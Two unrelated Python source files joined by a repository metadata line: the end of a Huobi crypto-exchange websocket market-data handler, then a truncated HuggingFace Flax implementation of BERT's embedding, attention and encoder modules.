data = {"sub": channel}
await self.send_json(data)
async def process_binary(self, raw):
""" Process binary message that received from Websocket connection.
Args:
raw: Binary message received from Websocket connection.
"""
data = json.loads(gzip.decompress(raw).decode())
logger.debug("data:", json.dumps(data), caller=self)
channel = data.get("ch")
if not channel:
if data.get("ping"):
hb_msg = {"pong": data.get("ping")}
await self.send_json(hb_msg)
return
symbol = self._c_to_s[channel]
if channel.find("kline") != -1:
cur_kline = data["tick"]
if self._prev_kline_map[symbol]: #如果存在前一根k线
prev_kline = self._prev_kline_map[symbol]
if prev_kline["id"] != cur_kline["id"]: #前一根k线的开始时间与当前k线开始时间不同,意味着前一根k线已经统计完毕,通知上层策略
info = {
"platform": self._platform,
"symbol": symbol,
"open": prev_kline["open"],
"high": prev_kline["high"],
"low": prev_kline["low"],
"close": prev_kline["close"],
"volume": prev_kline["amount"], #火币现货接口居然用amount表示成交量,vol表示成交额,也是晕了.
"timestamp": prev_kline["id"]*1000, #id字段表示以秒为单位的开始时间,转换为毫秒为单位
"kline_type": MARKET_TYPE_KLINE
}
kline = Kline(**info)
SingleTask.run(self.cb.on_kline_update_callback, kline)
self._prev_kline_map[symbol] = cur_kline
elif channel.find("depth") != -1:
d = data["tick"]
asks = d["asks"][:20] #[[price, quantity],....]
bids = d["bids"][:20]
info = {
"platform": self._platform,
"symbol": symbol,
"asks": asks,
"bids": bids,
"timestamp": d["ts"]
}
ob = Orderbook(**info)
SingleTask.run(self.cb.on_orderbook_update_callback, ob)
elif channel.find("trade") != -1:
tick = data["tick"]
for t in tick["data"]:
info = {
"platform": self._platform,
"symbol": symbol,
"action": ORDER_ACTION_BUY if t["direction"] == "buy" else ORDER_ACTION_SELL,
"price": t["price"],
"quantity": t["amount"],
"timestamp": t["ts"]
}
trade = Trade(**info)
SingleTask.run(self.cb.on_trade_update_callback, trade)
def _symbol_to_channel(self, symbol, channel_type):
""" Convert symbol to channel.
Args:
symbol: Trade pair name.
channel_type: channel name, kline / trade / depth.
"""
if channel_type == "kline":
channel = "market.{s}.kline.1min".format(s=symbol)
elif channel_type == "depth":
channel = "market.{s}.depth.step0".format(s=symbol)
elif channel_type == "trade":
channel = "market.{s}.trade.detail".format(s=symbol)
else:
logger.error("channel type error! channel type:", channel_type, calle=self)
return None
self._c_to_s[channel] = symbol
return channel
|
src/transformers/models/bert/modeling_flax_bert.py
|
manuelciosici/transformers
| 8,028 |
103049
|
# coding=utf-8
# Copyright 2021 The Google Flax Team Authors and The HuggingFace Inc. team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from typing import Callable, Optional, Tuple
import numpy as np
import flax
import flax.linen as nn
import jax
import jax.numpy as jnp
from flax.core.frozen_dict import FrozenDict, freeze, unfreeze
from flax.linen import combine_masks, make_causal_mask
from flax.linen.attention import dot_product_attention_weights
from flax.traverse_util import flatten_dict, unflatten_dict
from jax import lax
from ...modeling_flax_outputs import (
FlaxBaseModelOutputWithPastAndCrossAttentions,
FlaxBaseModelOutputWithPooling,
FlaxBaseModelOutputWithPoolingAndCrossAttentions,
FlaxCausalLMOutputWithCrossAttentions,
FlaxMaskedLMOutput,
FlaxMultipleChoiceModelOutput,
FlaxNextSentencePredictorOutput,
FlaxQuestionAnsweringModelOutput,
FlaxSequenceClassifierOutput,
FlaxTokenClassifierOutput,
)
from ...modeling_flax_utils import (
ACT2FN,
FlaxPreTrainedModel,
append_call_sample_docstring,
append_replace_return_docstrings,
overwrite_call_docstring,
)
from ...utils import ModelOutput, add_start_docstrings, add_start_docstrings_to_model_forward, logging
from .configuration_bert import BertConfig
logger = logging.get_logger(__name__)
_CHECKPOINT_FOR_DOC = "bert-base-uncased"
_CONFIG_FOR_DOC = "BertConfig"
_TOKENIZER_FOR_DOC = "BertTokenizer"
@flax.struct.dataclass
class FlaxBertForPreTrainingOutput(ModelOutput):
"""
Output type of [`BertForPreTraining`].
Args:
prediction_logits (`jnp.ndarray` of shape `(batch_size, sequence_length, config.vocab_size)`):
Prediction scores of the language modeling head (scores for each vocabulary token before SoftMax).
seq_relationship_logits (`jnp.ndarray` of shape `(batch_size, 2)`):
Prediction scores of the next sequence prediction (classification) head (scores of True/False continuation
before SoftMax).
hidden_states (`tuple(jnp.ndarray)`, *optional*, returned when `output_hidden_states=True` is passed or when `config.output_hidden_states=True`):
Tuple of `jnp.ndarray` (one for the output of the embeddings + one for the output of each layer) of shape
`(batch_size, sequence_length, hidden_size)`.
Hidden-states of the model at the output of each layer plus the initial embedding outputs.
attentions (`tuple(jnp.ndarray)`, *optional*, returned when `output_attentions=True` is passed or when `config.output_attentions=True`):
Tuple of `jnp.ndarray` (one for each layer) of shape `(batch_size, num_heads, sequence_length,
sequence_length)`.
Attentions weights after the attention softmax, used to compute the weighted average in the self-attention
heads.
"""
prediction_logits: jnp.ndarray = None
seq_relationship_logits: jnp.ndarray = None
hidden_states: Optional[Tuple[jnp.ndarray]] = None
attentions: Optional[Tuple[jnp.ndarray]] = None
BERT_START_DOCSTRING = r"""
This model inherits from [`FlaxPreTrainedModel`]. Check the superclass documentation for the generic methods the
library implements for all its model (such as downloading, saving and converting weights from PyTorch models)
This model is also a Flax Linen [flax.linen.Module](https://flax.readthedocs.io/en/latest/flax.linen.html#module)
subclass. Use it as a regular Flax linen Module and refer to the Flax documentation for all matter related to
general usage and behavior.
Finally, this model supports inherent JAX features such as:
- [Just-In-Time (JIT) compilation](https://jax.readthedocs.io/en/latest/jax.html#just-in-time-compilation-jit)
- [Automatic Differentiation](https://jax.readthedocs.io/en/latest/jax.html#automatic-differentiation)
- [Vectorization](https://jax.readthedocs.io/en/latest/jax.html#vectorization-vmap)
- [Parallelization](https://jax.readthedocs.io/en/latest/jax.html#parallelization-pmap)
Parameters:
config ([`BertConfig`]): Model configuration class with all the parameters of the model.
Initializing with a config file does not load the weights associated with the model, only the
configuration. Check out the [`~FlaxPreTrainedModel.from_pretrained`] method to load the model weights.
dtype (`jax.numpy.dtype`, *optional*, defaults to `jax.numpy.float32`):
The data type of the computation. Can be one of `jax.numpy.float32`, `jax.numpy.float16` (on GPUs) and
`jax.numpy.bfloat16` (on TPUs).
This can be used to enable mixed-precision training or half-precision inference on GPUs or TPUs. If
specified all the computation will be performed with the given `dtype`.
**Note that this only specifies the dtype of the computation and does not influence the dtype of model
parameters.**
If you wish to change the dtype of the model parameters, see [`~FlaxPreTrainedModel.to_fp16`] and
[`~FlaxPreTrainedModel.to_bf16`].
dtype (`jax.numpy.dtype`, *optional*, defaults to `jax.numpy.float32`):
The data type of the computation. Can be one of `jax.numpy.float32`, `jax.numpy.float16` (on GPUs) and
`jax.numpy.bfloat16` (on TPUs).
This can be used to enable mixed-precision training or half-precision inference on GPUs or TPUs. If
specified all the computation will be performed with the given `dtype`.
**Note that this only specifies the dtype of the computation and does not influence the dtype of model
parameters.**
If you wish to change the dtype of the model parameters, see [`~FlaxPreTrainedModel.to_fp16`] and
[`~FlaxPreTrainedModel.to_bf16`].
"""
BERT_INPUTS_DOCSTRING = r"""
Args:
input_ids (`numpy.ndarray` of shape `({0})`):
Indices of input sequence tokens in the vocabulary.
Indices can be obtained using [`BertTokenizer`]. See [`PreTrainedTokenizer.encode`] and
[`PreTrainedTokenizer.__call__`] for details.
[What are input IDs?](../glossary#input-ids)
attention_mask (`numpy.ndarray` of shape `({0})`, *optional*):
Mask to avoid performing attention on padding token indices. Mask values selected in `[0, 1]`:
- 1 for tokens that are **not masked**,
- 0 for tokens that are **masked**.
[What are attention masks?](../glossary#attention-mask)
token_type_ids (`numpy.ndarray` of shape `({0})`, *optional*):
Segment token indices to indicate first and second portions of the inputs. Indices are selected in `[0,
1]`:
- 0 corresponds to a *sentence A* token,
- 1 corresponds to a *sentence B* token.
[What are token type IDs?](../glossary#token-type-ids)
position_ids (`numpy.ndarray` of shape `({0})`, *optional*):
Indices of positions of each input sequence tokens in the position embeddings. Selected in the range `[0,
config.max_position_embeddings - 1]`.
head_mask (`numpy.ndarray` of shape `({0})`, `optional):
Mask to nullify selected heads of the attention modules. Mask values selected in `[0, 1]`:
- 1 indicates the head is **not masked**,
- 0 indicates the head is **masked**.
return_dict (`bool`, *optional*):
Whether or not to return a [`~utils.ModelOutput`] instead of a plain tuple.
"""
class FlaxBertEmbeddings(nn.Module):
"""Construct the embeddings from word, position and token_type embeddings."""
config: BertConfig
dtype: jnp.dtype = jnp.float32 # the dtype of the computation
def setup(self):
self.word_embeddings = nn.Embed(
self.config.vocab_size,
self.config.hidden_size,
embedding_init=jax.nn.initializers.normal(stddev=self.config.initializer_range),
)
self.position_embeddings = nn.Embed(
self.config.max_position_embeddings,
self.config.hidden_size,
embedding_init=jax.nn.initializers.normal(stddev=self.config.initializer_range),
)
self.token_type_embeddings = nn.Embed(
self.config.type_vocab_size,
self.config.hidden_size,
embedding_init=jax.nn.initializers.normal(stddev=self.config.initializer_range),
)
self.LayerNorm = nn.LayerNorm(epsilon=self.config.layer_norm_eps, dtype=self.dtype)
self.dropout = nn.Dropout(rate=self.config.hidden_dropout_prob)
def __call__(self, input_ids, token_type_ids, position_ids, attention_mask, deterministic: bool = True):
# Embed
inputs_embeds = self.word_embeddings(input_ids.astype("i4"))
position_embeds = self.position_embeddings(position_ids.astype("i4"))
token_type_embeddings = self.token_type_embeddings(token_type_ids.astype("i4"))
# Sum all embeddings
hidden_states = inputs_embeds + token_type_embeddings + position_embeds
# Layer Norm
hidden_states = self.LayerNorm(hidden_states)
hidden_states = self.dropout(hidden_states, deterministic=deterministic)
return hidden_states
class FlaxBertSelfAttention(nn.Module):
config: BertConfig
causal: bool = False
dtype: jnp.dtype = jnp.float32 # the dtype of the computation
def setup(self):
self.head_dim = self.config.hidden_size // self.config.num_attention_heads
if self.config.hidden_size % self.config.num_attention_heads != 0:
raise ValueError(
"`config.hidden_size`: {self.config.hidden_size} has to be a multiple of `config.num_attention_heads`\
: {self.config.num_attention_heads}"
)
self.query = nn.Dense(
self.config.hidden_size,
dtype=self.dtype,
kernel_init=jax.nn.initializers.normal(self.config.initializer_range),
)
self.key = nn.Dense(
self.config.hidden_size,
dtype=self.dtype,
kernel_init=jax.nn.initializers.normal(self.config.initializer_range),
)
self.value = nn.Dense(
self.config.hidden_size,
dtype=self.dtype,
kernel_init=jax.nn.initializers.normal(self.config.initializer_range),
)
if self.causal:
self.causal_mask = make_causal_mask(
jnp.ones((1, self.config.max_position_embeddings), dtype="bool"), dtype="bool"
)
def _split_heads(self, hidden_states):
return hidden_states.reshape(hidden_states.shape[:2] + (self.config.num_attention_heads, self.head_dim))
def _merge_heads(self, hidden_states):
return hidden_states.reshape(hidden_states.shape[:2] + (self.config.hidden_size,))
@nn.compact
# Copied from transformers.models.bart.modeling_flax_bart.FlaxBartAttention._concatenate_to_cache
def _concatenate_to_cache(self, key, value, query, attention_mask):
"""
This function takes projected key, value states from a single input token and concatenates the states to cached
states from previous steps. This function is slighly adapted from the official Flax repository:
https://github.com/google/flax/blob/491ce18759622506588784b4fca0e4bf05f8c8cd/flax/linen/attention.py#L252
"""
# detect if we're initializing by absence of existing cache data.
is_initialized = self.has_variable("cache", "cached_key")
cached_key = self.variable("cache", "cached_key", jnp.zeros, key.shape, key.dtype)
cached_value = self.variable("cache", "cached_value", jnp.zeros, value.shape, value.dtype)
cache_index = self.variable("cache", "cache_index", lambda: jnp.array(0, dtype=jnp.int32))
if is_initialized:
*batch_dims, max_length, num_heads, depth_per_head = cached_key.value.shape
# update key, value caches with our new 1d spatial slices
cur_index = cache_index.value
indices = (0,) * len(batch_dims) + (cur_index, 0, 0)
key = lax.dynamic_update_slice(cached_key.value, key, indices)
value = lax.dynamic_update_slice(cached_value.value, value, indices)
cached_key.value = key
cached_value.value = value
num_updated_cache_vectors = query.shape[1]
cache_index.value = cache_index.value + num_updated_cache_vectors
# causal mask for cached decoder self-attention: our single query position should only attend to those key positions that have already been generated and cached, not the remaining zero elements.
pad_mask = jnp.broadcast_to(
jnp.arange(max_length) < cur_index + num_updated_cache_vectors,
tuple(batch_dims) + (1, num_updated_cache_vectors, max_length),
)
attention_mask = combine_masks(pad_mask, attention_mask)
return key, value, attention_mask
def __call__(
self,
hidden_states,
attention_mask,
layer_head_mask,
key_value_states: Optional[jnp.array] = None,
init_cache: bool = False,
deterministic=True,
output_attentions: bool = False,
):
# if key_value_states are provided this layer is used as a cross-attention layer
# for the decoder
is_cross_attention = key_value_states is not None
batch_size = hidden_states.shape[0]
# get query proj
query_states = self.query(hidden_states)
# get key, value proj
if is_cross_attention:
# cross_attentions
key_states = self.key(key_value_states)
value_states = self.value(key_value_states)
else:
# self_attention
key_states = self.key(hidden_states)
value_states = self.value(hidden_states)
query_states = self._split_heads(query_states)
key_states = self._split_heads(key_states)
value_states = self._split_heads(value_states)
# handle cache prepare causal attention mask
if self.causal:
query_length, key_length = query_states.shape[1], key_states.shape[1]
if self.has_variable("cache", "cached_key"):
mask_shift = self.variables["cache"]["cache_index"]
max_decoder_length = self.variables["cache"]["cached_key"].shape[1]
causal_mask = lax.dynamic_slice(
self.causal_mask, (0, 0, mask_shift, 0), (1, 1, query_length, max_decoder_length)
)
else:
causal_mask = self.causal_mask[:, :, :query_length, :key_length]
causal_mask = jnp.broadcast_to(causal_mask, (batch_size,) + causal_mask.shape[1:])
# combine masks if needed
if attention_mask is not None and self.causal:
attention_mask = jnp.broadcast_to(jnp.expand_dims(attention_mask, axis=(-3, -2)), causal_mask.shape)
attention_mask = combine_masks(attention_mask, causal_mask)
elif self.causal:
attention_mask = causal_mask
elif attention_mask is not None:
attention_mask = jnp.expand_dims(attention_mask, axis=(-3, -2))
# During fast autoregressive decoding, we feed one position at a time,
# and cache the keys and values step by step.
if self.causal and (self.has_variable("cache", "cached_key") or init_cache):
key_states, value_states, attention_mask = self._concatenate_to_cache(
key_states, value_states, query_states, attention_mask
)
# Convert the boolean attention mask to an attention bias.
if attention_mask is not None:
# attention mask in the form of attention bias
attention_bias = lax.select(
attention_mask > 0,
jnp.full(attention_mask.shape, 0.0).astype(self.dtype),
jnp.full(attention_mask.shape, -1e10).astype(self.dtype),
)
else:
attention_bias = None
dropout_rng = None
if not deterministic and self.config.attention_probs_dropout_prob > 0.0:
dropout_rng = self.make_rng("dropout")
attn_weights = dot_product_attention_weights(
query_states,
key_states,
bias=attention_bias,
dropout_rng=dropout_rng,
dropout_rate=self.config.attention_probs_dropout_prob,
broadcast_dropout=True,
deterministic=deterministic,
dtype=self.dtype,
precision=None,
)
# Mask heads if we want to
if layer_head_mask is not None:
attn_weights = jnp.einsum("...hqk,h->...hqk", attn_weights, layer_head_mask)
attn_output = jnp.einsum("...hqk,...khd->...qhd", attn_weights, value_states)
attn_output = attn_output.reshape(attn_output.shape[:2] + (-1,))
outputs = (attn_output, attn_weights) if output_attentions else (attn_output,)
return outputs
class FlaxBertSelfOutput(nn.Module):
config: BertConfig
dtype: jnp.dtype = jnp.float32 # the dtype of the computation
def setup(self):
self.dense = nn.Dense(
self.config.hidden_size,
kernel_init=jax.nn.initializers.normal(self.config.initializer_range),
dtype=self.dtype,
)
self.LayerNorm = nn.LayerNorm(epsilon=self.config.layer_norm_eps, dtype=self.dtype)
self.dropout = nn.Dropout(rate=self.config.hidden_dropout_prob)
def __call__(self, hidden_states, input_tensor, deterministic: bool = True):
hidden_states = self.dense(hidden_states)
hidden_states = self.dropout(hidden_states, deterministic=deterministic)
hidden_states = self.LayerNorm(hidden_states + input_tensor)
return hidden_states
class FlaxBertAttention(nn.Module):
config: BertConfig
causal: bool = False
dtype: jnp.dtype = jnp.float32
def setup(self):
self.self = FlaxBertSelfAttention(self.config, causal=self.causal, dtype=self.dtype)
self.output = FlaxBertSelfOutput(self.config, dtype=self.dtype)
def __call__(
self,
hidden_states,
attention_mask,
layer_head_mask,
key_value_states=None,
init_cache=False,
deterministic=True,
output_attentions: bool = False,
):
# Attention mask comes in as attention_mask.shape == (*batch_sizes, kv_length)
# FLAX expects: attention_mask.shape == (*batch_sizes, 1, 1, kv_length) such that it is broadcastable
# with attn_weights.shape == (*batch_sizes, num_heads, q_length, kv_length)
attn_outputs = self.self(
hidden_states,
attention_mask,
layer_head_mask=layer_head_mask,
key_value_states=key_value_states,
init_cache=init_cache,
deterministic=deterministic,
output_attentions=output_attentions,
)
attn_output = attn_outputs[0]
hidden_states = self.output(attn_output, hidden_states, deterministic=deterministic)
outputs = (hidden_states,)
if output_attentions:
outputs += (attn_outputs[1],)
return outputs
class FlaxBertIntermediate(nn.Module):
config: BertConfig
dtype: jnp.dtype = jnp.float32 # the dtype of the computation
def setup(self):
self.dense = nn.Dense(
self.config.intermediate_size,
kernel_init=jax.nn.initializers.normal(self.config.initializer_range),
dtype=self.dtype,
)
self.activation = ACT2FN[self.config.hidden_act]
def __call__(self, hidden_states):
hidden_states = self.dense(hidden_states)
hidden_states = self.activation(hidden_states)
return hidden_states
class FlaxBertOutput(nn.Module):
config: BertConfig
dtype: jnp.dtype = jnp.float32 # the dtype of the computation
def setup(self):
self.dense = nn.Dense(
self.config.hidden_size,
kernel_init=jax.nn.initializers.normal(self.config.initializer_range),
dtype=self.dtype,
)
self.dropout = nn.Dropout(rate=self.config.hidden_dropout_prob)
self.LayerNorm = nn.LayerNorm(epsilon=self.config.layer_norm_eps, dtype=self.dtype)
def __call__(self, hidden_states, attention_output, deterministic: bool = True):
hidden_states = self.dense(hidden_states)
hidden_states = self.dropout(hidden_states, deterministic=deterministic)
hidden_states = self.LayerNorm(hidden_states + attention_output)
return hidden_states
class FlaxBertLayer(nn.Module):
config: BertConfig
dtype: jnp.dtype = jnp.float32 # the dtype of the computation
def setup(self):
self.attention = FlaxBertAttention(self.config, causal=self.config.is_decoder, dtype=self.dtype)
self.intermediate = FlaxBertIntermediate(self.config, dtype=self.dtype)
self.output = FlaxBertOutput(self.config, dtype=self.dtype)
if self.config.add_cross_attention:
self.crossattention = FlaxBertAttention(self.config, causal=False, dtype=self.dtype)
def __call__(
self,
hidden_states,
attention_mask,
layer_head_mask,
encoder_hidden_states: Optional[jnp.ndarray] = None,
encoder_attention_mask: Optional[jnp.ndarray] = None,
init_cache: bool = False,
deterministic: bool = True,
output_attentions: bool = False,
):
# Self Attention
attention_outputs = self.attention(
hidden_states,
attention_mask,
layer_head_mask=layer_head_mask,
init_cache=init_cache,
deterministic=deterministic,
output_attentions=output_attentions,
)
attention_output = attention_outputs[0]
# Cross-Attention Block
if encoder_hidden_states is not None:
cross_attention_outputs = self.crossattention(
attention_output,
attention_mask=encoder_attention_mask,
layer_head_mask=layer_head_mask,
key_value_states=encoder_hidden_states,
deterministic=deterministic,
output_attentions=output_attentions,
)
attention_output = cross_attention_outputs[0]
hidden_states = self.intermediate(attention_output)
hidden_states = self.output(hidden_states, attention_output, deterministic=deterministic)
outputs = (hidden_states,)
if output_attentions:
outputs += (attention_outputs[1],)
if encoder_hidden_states is not None:
outputs += (cross_attention_outputs[1],)
return outputs
class FlaxBertLayerCollection(nn.Module):
config: BertConfig
dtype: jnp.dtype = jnp.float32 # the dtype of the computation
def setup(self):
self.layers = [
FlaxBertLayer(self.config, name=str(i), dtype=self.dtype) for i in range(self.config.num_hidden_layers)
]
def __call__(
self,
hidden_states,
attention_mask,
head_mask,
encoder_hidden_states: Optional[jnp.ndarray] = None,
encoder_attention_mask: Optional[jnp.ndarray] = None,
init_cache: bool = False,
deterministic: bool = True,
output_attentions: bool = False,
output_hidden_states: bool = False,
return_dict: bool = True,
):
all_attentions = () if output_attentions else None
all_hidden_states = () if output_hidden_states else None
all_cross_attentions = () if (output_attentions and encoder_hidden_states is not None) else None
# Check if head_mask has a correct number of layers specified if desired
if head_mask is not None:
if head_mask.shape[0] != (len(self.layers)):
raise ValueError(
f"The head_mask should be specified for {len(self.layers)} layers, but it is for \
{head_mask.shape[0]}."
)
for i, layer in enumerate(self.layers):
if output_hidden_states:
all_hidden_states += (hidden_states,)
layer_outputs = layer(
hidden_states,
attention_mask,
layer_head_mask=head_mask[i] if head_mask is not None else None,
encoder_hidden_states=encoder_hidden_states,
encoder_attention_mask=encoder_attention_mask,
init_cache=init_cache,
deterministic=deterministic,
output_attentions=output_attentions,
)
hidden_states = layer_outputs[0]
if output_attentions:
all_attentions += (layer_outputs[1],)
if encoder_hidden_states is not None:
all_cross_attentions += (layer_outputs[2],)
if output_hidden_states:
all_hidden_states += (hidden_states,)
outputs = (hidden_states,)
if not return_dict:
return tuple(v for v in outputs if v is not None)
return FlaxBaseModelOutputWithPastAndCrossAttentions(
last_hidden_state=hidden_states,
hidden_states=all_hidden_states,
attentions=all_attentions,
cross_attentions=all_cross_attentions,
)
class FlaxBertEncoder(nn.Module):
config: BertConfig
dtype: jnp.dtype = jnp.float32 # the dtype of the computation
def setup(self):
self.layer = FlaxBertLayerCollection(self.config, dtype=self.dtype)
def __call__(
self,
hidden_states,
attention_mask,
head_mask,
encoder_hidden_states: Optional[jnp.ndarray] = None,
encoder_attention_mask: Optional[jnp.ndarray] = None,
init_cache: bool = False,
deterministic: bool = True,
output_attentions: bool = False,
output_hidden_states: bool = False,
return_dict: bool = True,
):
return self.layer(
hidden_states,
attention_mask,
head_mask=head_mask,
encoder_hidden_states=encoder_hidden_states,
encoder_attention_mask=encoder_attention_mask,
init_cache=init_cache,
deterministic=deterministic,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
)
class FlaxBertPooler(nn.Module):
config: BertConfig
dtype: jnp.dtype = jnp.float32 # the dtype of the computation
def setup(self):
self.dense = nn.Dense(
self.config.hidden_size,
kernel_init=jax.nn.initializers.normal(self.config.initializer_range),
dtype=self.dtype,
)
def __call__(self, hidden_states):
cls_hidden_state = hidden_states[:, 0]
cls_hidden_state = self.dense(cls_hidden_state)
return nn.tanh(cls_hidden_state)
class FlaxBertPredictionHeadTransform(nn.Module):
config: BertConfig
dtype: jnp.dtype = jnp.float32
def setup(self):
self.dense = nn.Dense(self.config.hidden_size, dtype=self.dtype)
self.activation = ACT2FN[self.config.hidden_act]
self.LayerNorm = nn.LayerNorm(epsilon=self.config.layer_norm_eps, dtype=self.dtype)
def __call__(self, hidden_states):
hidden_states = self.dense(hidden_states)
hidden_states = self.activation(hidden_states)
return self.LayerNorm(hidden_states)
class FlaxBertLMPredictionHead(nn.Module):
config: BertConfig
dtype: jnp.dtype = jnp.float32
bias_init: Callable[..., np.ndarray] = jax.nn.initializers.zeros
def setup(self):
self.transform = FlaxBertPredictionHeadTransform(self.config, dtype=self.dtype)
self.decoder = nn.Dense(self.config.vocab_size, dtype=self.dtype, use_bias=False)
self.bias = self.param("bias", self.bias_init, (self.config.vocab_size,))
def __call__(self, hidden_states, shared_embedding=None):
hidden_states = self.transform(hidden_states)
if shared_embedding is not None:
hidden_states = self.decoder.apply({"params": {"kernel": shared_embedding.T}}, hidden_states)
else:
hidden_states = self.decoder(hidden_states)
bias = jnp.asarray(self.bias, self.dtype)
hidden_states += bias
return hidden_states
class FlaxBertOnlyMLMHead(nn.Module):
config: BertConfig
dtype: jnp.dtype = jnp.float32
def setup(self):
self.predictions = FlaxBertLMPredictionHead(self.config, dtype=self.dtype)
def __call__(self, hidden_states, shared_embedding=None):
hidden_states = self.predictions(hidden_states, shared_embedding=shared_embedding)
return hidden_states
class FlaxBertOnlyNSPHead(nn.Module):
dtype: jnp.dtype = jnp.float32
def setup(self):
self.seq_relationship = nn.Dense(2, dtype=self.dtype)
def __call__(self, pooled_output):
return self.seq_relationship(pooled_output)
class FlaxBertPreTrainingHeads(nn.Module):
config: BertConfig
dtype: jnp.dtype = jnp.float32
def setup(self):
self.predictions = FlaxBertLMPredictionHead(self.config, dtype=self.dtype)
self.seq_relationship = nn.Dense(2, dtype=self.dtype)
def __call__(self, hidden_states, pooled_output, shared_embedding=None):
prediction_scores = self.predictions(hidden_states, shared_embedding=shared_embedding)
seq_relationship_score = self.seq_relationship(pooled_output)
return prediction_scores, seq_relationship_score
class FlaxBertPreTrainedModel(FlaxPreTrainedModel):
"""
An abstract class to handle weights initialization and a simple interface for downloading and loading pretrained
models.
"""
config_class = BertConfig
base_model_prefix = "bert"
module_class: nn.Module = None
def __init__(
self,
config: BertConfig,
input_shape: Tuple = (1, 1),
seed: int = 0,
dtype: jnp.dtype = jnp.float32,
_do_init: bool = True,
**kwargs
):
module = self.module_class(config=config, dtype=dtype, **kwargs)
super().__init__(config, module, input_shape=input_shape, seed=seed, dtype=dtype, _do_init=_do_init)
def init_weights(self, rng: jax.random.PRNGKey, input_shape: Tuple, params: FrozenDict = None) -> FrozenDict:
# init input tensors
input_ids = jnp.zeros(input_shape, dtype="i4")
token_type_ids = jnp.zeros_like(input_ids)
position_ids = jnp.broadcast_to(jnp.arange(jnp.atleast_2d(input_ids).shape[-1]), input_shape)
attention_mask = jnp.ones_like(input_ids)
head_mask = jnp.ones((self.config.num_hidden_layers, self.config.num_attention_heads))
params_rng, dropout_rng = jax.random.split(rng)
rngs = {"params": params_rng, "dropout": dropout_rng}
if self.config.add_cross_attention:
encoder_hidden_states = jnp.zeros(input_shape + (self.config.hidden_size,))
encoder_attention_mask = attention_mask
module_init_outputs = self.module.init(
rngs,
input_ids,
attention_mask,
token_type_ids,
position_ids,
head_mask,
encoder_hidden_states,
encoder_attention_mask,
return_dict=False,
)
else:
module_init_outputs = self.module.init(
rngs, input_ids, attention_mask, token_type_ids, position_ids, head_mask, return_dict=False
)
random_params = module_init_outputs["params"]
if params is not None:
random_params = flatten_dict(unfreeze(random_params))
params = flatten_dict(unfreeze(params))
for missing_key in self._missing_keys:
params[missing_key] = random_params[missing_key]
self._missing_keys = set()
return freeze(unflatten_dict(params))
else:
return random_params
# Copied from transformers.models.bart.modeling_flax_bart.FlaxBartDecoderPreTrainedModel.init_cache
def init_cache(self, batch_size, max_length):
r"""
Args:
batch_size (`int`):
batch_size used for fast auto-regressive decoding. Defines the batch size of the initialized cache.
max_length (`int`):
maximum possible length for auto-regressive decoding. Defines the sequence length of the initialized
cache.
"""
# init input variables to retrieve cache
input_ids = jnp.ones((batch_size, max_length), dtype="i4")
attention_mask = jnp.ones_like(input_ids, dtype="i4")
position_ids = jnp.broadcast_to(jnp.arange(jnp.atleast_2d(input_ids).shape[-1]), input_ids.shape)
init_variables = self.module.init(
jax.random.PRNGKey(0), input_ids, attention_mask, position_ids, return_dict=False, init_cache=True
)
return unfreeze(init_variables["cache"])
@add_start_docstrings_to_model_forward(BERT_INPUTS_DOCSTRING.format("batch_size, sequence_length"))
def __call__(
self,
input_ids,
attention_mask=None,
token_type_ids=None,
position_ids=None,
head_mask=None,
encoder_hidden_states=None,
encoder_attention_mask=None,
params: dict = None,
dropout_rng: jax.random.PRNGKey = None,
train: bool = False,
output_attentions: Optional[bool] = None,
output_hidden_states: Optional[bool] = None,
return_dict: Optional[bool] = None,
past_key_values: dict = None,
):
output_attentions = output_attentions if output_attentions is not None else self.config.output_attentions
output_hidden_states = (
output_hidden_states if output_hidden_states is not None else self.config.output_hidden_states
)
return_dict = return_dict if return_dict is not None else self.config.return_dict
# init input tensors if not passed
if token_type_ids is None:
token_type_ids = jnp.zeros_like(input_ids)
if position_ids is None:
position_ids = jnp.broadcast_to(jnp.arange(jnp.atleast_2d(input_ids).shape[-1]), input_ids.shape)
if attention_mask is None:
attention_mask = jnp.ones_like(input_ids)
if head_mask is None:
head_mask = jnp.ones((self.config.num_hidden_layers, self.config.num_attention_heads))
# Handle any PRNG if needed
rngs = {}
if dropout_rng is not None:
rngs["dropout"] = dropout_rng
inputs = {"params": params or self.params}
if self.config.add_cross_attention:
# if past_key_values are passed then cache is already initialized a private flag init_cache has to be passed
# down to ensure cache is used. It has to be made sure that cache is marked as mutable so that it can be
# changed by FlaxBertAttention module
if past_key_values:
inputs["cache"] = past_key_values
mutable = ["cache"]
else:
mutable = False
outputs = self.module.apply(
inputs,
jnp.array(input_ids, dtype="i4"),
jnp.array(attention_mask, dtype="i4"),
token_type_ids=jnp.array(token_type_ids, dtype="i4"),
position_ids=jnp.array(position_ids, dtype="i4"),
head_mask=jnp.array(head_mask, dtype="i4"),
encoder_hidden_states=encoder_hidden_states,
encoder_attention_mask=encoder_attention_mask,
deterministic=not train,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
rngs=rngs,
mutable=mutable,
)
# add updated cache to model output
if past_key_values is not None and return_dict:
outputs, past_key_values = outputs
outputs["past_key_values"] = unfreeze(past_key_values["cache"])
return outputs
elif past_key_values is not None and not return_dict:
outputs, past_key_values = outputs
outputs = outputs[:1] + (unfreeze(past_key_values["cache"]),) + outputs[1:]
else:
outputs = self.module.apply(
inputs,
jnp.array(input_ids, dtype="i4"),
jnp.array(attention_mask, dtype="i4"),
token_type_ids=jnp.array(token_type_ids, dtype="i4"),
position_ids=jnp.array(position_ids, dtype="i4"),
head_mask=jnp.array(head_mask, dtype="i4"),
deterministic=not train,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
rngs=rngs,
)
return outputs
class FlaxBertModule(nn.Module):
config: BertConfig
dtype: jnp.dtype = jnp.float32 # the dtype of the computation
add_pooling_layer: bool = True
def setup(self):
self.embeddings = FlaxBertEmbeddings(self.config, dtype=self.dtype)
self.encoder = FlaxBertEncoder(self.config, dtype=self.dtype)
self.pooler = FlaxBertPooler(self.config, dtype=self.dtype)
def __call__(
self,
input_ids,
attention_mask,
token_type_ids: Optional[jnp.ndarray] = None,
